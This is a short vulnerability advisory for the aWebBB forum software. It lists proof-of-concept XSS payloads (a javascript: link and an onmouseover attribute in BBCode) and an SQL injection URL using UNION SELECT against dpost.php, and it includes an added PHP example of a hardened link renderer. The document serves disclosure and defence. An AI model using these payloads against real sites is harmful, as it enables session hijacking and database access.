PoC/Exploit for Multiple XSS and SQL Injection in aWebBB

Published Proof of Concept code - Multiple XSS and SQL Injection in aWebBB.

Description: Available
Solution: Not available - check vendor's website

1. XSS Example.

URL: http://[host]/post.php?c=
New Forum Thread:
Thread Name: [XSS]
Thread Text: [XSS]


BBCode XSS Examples:

<a href=javascript:alert(1)>linked text</a>
<a href=www.website.com onmouseover="alert(2)">linked text</a>
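Both rendered links above show the same two gaps: the link target's scheme is not checked, and the `href` value is neither quoted nor encoded. A hardened link renderer follows as an added example in PHP; it is not aWebBB code and not part of the original advisory. The function name `render_link` and the last two sample inputs are assumptions made for illustration.

```php
<?php
// Added example; not aWebBB code. render_link() is a hypothetical helper name.

function render_link(string $url, string $text): string
{
    // Link text is data, never markup.
    $safeText = htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    $url = trim($url);

    // Refuse whitespace and control characters anywhere in the target:
    // they are what ends an unquoted attribute value early, and some
    // browsers ignore them inside a scheme name.
    if ($url === '' || preg_match('/[\x00-\x20\x7f]/', $url)) {
        return $safeText;
    }

    if (!preg_match('#^https?://#i', $url)) {
        // Anything else containing ":" is treated as a foreign scheme
        // (javascript:, data:, vbscript:, ...) and refused. This also refuses
        // scheme-less "host:port" targets, which is the fail-closed choice.
        if (strpos($url, ':') !== false) {
            return $safeText;
        }
        $url = 'http://' . $url;   // bare "www.example.com/path"
    }

    // Quote the attribute and encode the value so no character can leave it.
    $safeUrl = htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<a href="' . $safeUrl . '" rel="nofollow noopener">' . $safeText . '</a>';
}

// Constructed inputs: the first two are the link targets from the examples above.
$samples = [
    'javascript:alert(1)',
    'www.website.com onmouseover="alert(2)"',
    'www.website.com',
    'https://example.org/?a=1&b="2"',
];
foreach ($samples as $target) {
    echo render_link($target, 'linked text'), PHP_EOL;
}
```

The first two inputs come back as plain escaped text with no anchor element; the last two become links with a quoted, entity-encoded `href`.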


2. SQL Injection Example.

URL: http://[host]/dpost.php?p=asddd'%20union%20select%201,2,3,4,5,6,7,8,9,10/*
